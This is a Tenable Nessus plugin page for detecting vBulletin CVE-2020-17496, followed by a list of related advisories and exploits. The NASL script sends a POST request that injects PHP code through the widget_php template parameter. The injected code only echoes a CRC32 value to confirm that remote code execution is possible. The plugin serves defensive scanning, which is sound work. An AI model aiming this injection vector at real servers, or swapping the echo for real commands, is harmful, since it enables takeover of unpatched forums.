Lucene search
This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASLHistoryAug 10, 2020 - 12:00 a.m.
vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)
2020-08-1000:00:00
This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
259
The version of vBulletin running on the remote host is affected by an input-validation flaw in the ajax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for CVE-2019-16759.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(139457);
script_version("1.10");
script_set_attribute(attribute:"plugin_modification_date", value:"2023/04/25");
script_cve_id("CVE-2019-16759", "CVE-2020-17496");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
script_xref(name:"CEA-ID", value:"CEA-2020-0092");
script_name(english:"vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)");
script_set_attribute(attribute:"synopsis", value:
"A bulletin board system running on the remote web server has a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of vBulletin running on the remote host is affected by an input-validation flaw in the
ajax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for
CVE-2019-16759.");
# https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?62dedb88");
script_set_attribute(attribute:"solution", value:
"Disable PHP widgets or contact the vendor.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-17496");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"CANVAS");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/08/09");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/08/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:vbulletin:vbulletin");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("vbulletin_detect.nasl");
script_require_keys("www/vBulletin");
script_require_ports("Services/www", 80);
exit(0);
}
include("http.inc");
include("webapp_func.inc");
port = get_http_port(default:80);
install = get_kb_item_or_exit('www/'+port+'/vBulletin');
matches = pregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!matches)
audit(AUDIT_WEB_APP_NOT_INST, "vBulletin", port);
dir = matches[2];
if (dir !~ '/$')
dir = dir + '/';
url = dir + 'ajax/render/widget_tabbedcontainer_tab_panel';
res = http_send_recv3(
method:'POST',
item:url,
data:'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo(\'crc32("Nessus")=\'.crc32(\'Nessus\'));',
add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),
port:port,
exit_on_fail:TRUE
);
# CRC32('Nessus') is 1631274700
if ('1631274700' >!< res[2])
audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));
report =
'Nessus was able to verify the issue using the following request :\n\n' +
http_last_sent_request() + '\n\n' +
'The above request resulted in the following output :\n\n' +
res[2] + '\n\n';
security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);
Related
nuclei
nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-24 20:00:52
vBulletin 5.0.0-5.5.4 - Remote Command Execution
2020-07-04 15:56:10
attackerkb
attackerkb
cve
cve
prion
prion
Design/Logic Flaw
2020-08-12 14:15:00
Design/Logic Flaw
2020-10-30 17:15:00
Cross site request forgery (csrf)
2019-09-24 22:15:00
checkpoint_advisories
checkpoint_advisories
vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)
2019-09-25 00:00:00
cisa_kev
cisa_kev
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
openvas
openvas
vBulletin 5.x RCE Vulnerability
2020-08-10 00:00:00
githubexploit
githubexploit
Exploit for Injection in Vbulletin
2020-09-03 14:41:29
Exploit for Injection in Vbulletin
2020-08-20 12:20:03
Exploit for Code Injection in Vbulletin
2020-08-24 16:15:10
thn
thn
Hackers Breach ZoneAlarm's Forum Site β Outdated vBulletin to Blame
2019-11-11 15:27:00
nessus
nessus
vBulletin 'widget_php' Command Execution
2019-10-23 00:00:00
threatpost
threatpost
vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach
2019-10-10 20:37:40
Rash of Exploits Targets Critical vBulletin RCE Bug
2019-09-26 17:45:03
Gitpaste-12 Worm Widens Set of Exploits in New Attacks
2020-12-15 21:29:51
packetstorm
packetstorm
vBulletin 5.x Pre-Auth Remote Code Execution
2019-09-28 00:00:00
vBulletin 5.x 0-Day Pre-Auth Remote Command Execution
2019-09-26 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
impervablog
impervablog
Attackers Are Quick to Exploit vBulletinβs Latest 0-day Remote Code Execution Vulnerability
2019-09-26 13:43:30
CrimeOps of the KashmirBlack Botnet β Part II
2020-10-22 18:55:05
zdt
zdt
vBulletin 5.5.4 Remote Command Execution Exploit #RCE
2019-12-11 00:00:00
vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution Exploit
2019-10-01 00:00:00
canvas
canvas
Immunity Canvas: VBULLETIN_WIDGET_RCE
2019-09-24 22:15:00
exploitdb
exploitdb
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
exploitpack
exploitpack
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
metasploit
metasploit
mssecure
mssecure
Ghost in the shell: Investigating web shell attacks
2020-02-04 17:30:40
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
Related for VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL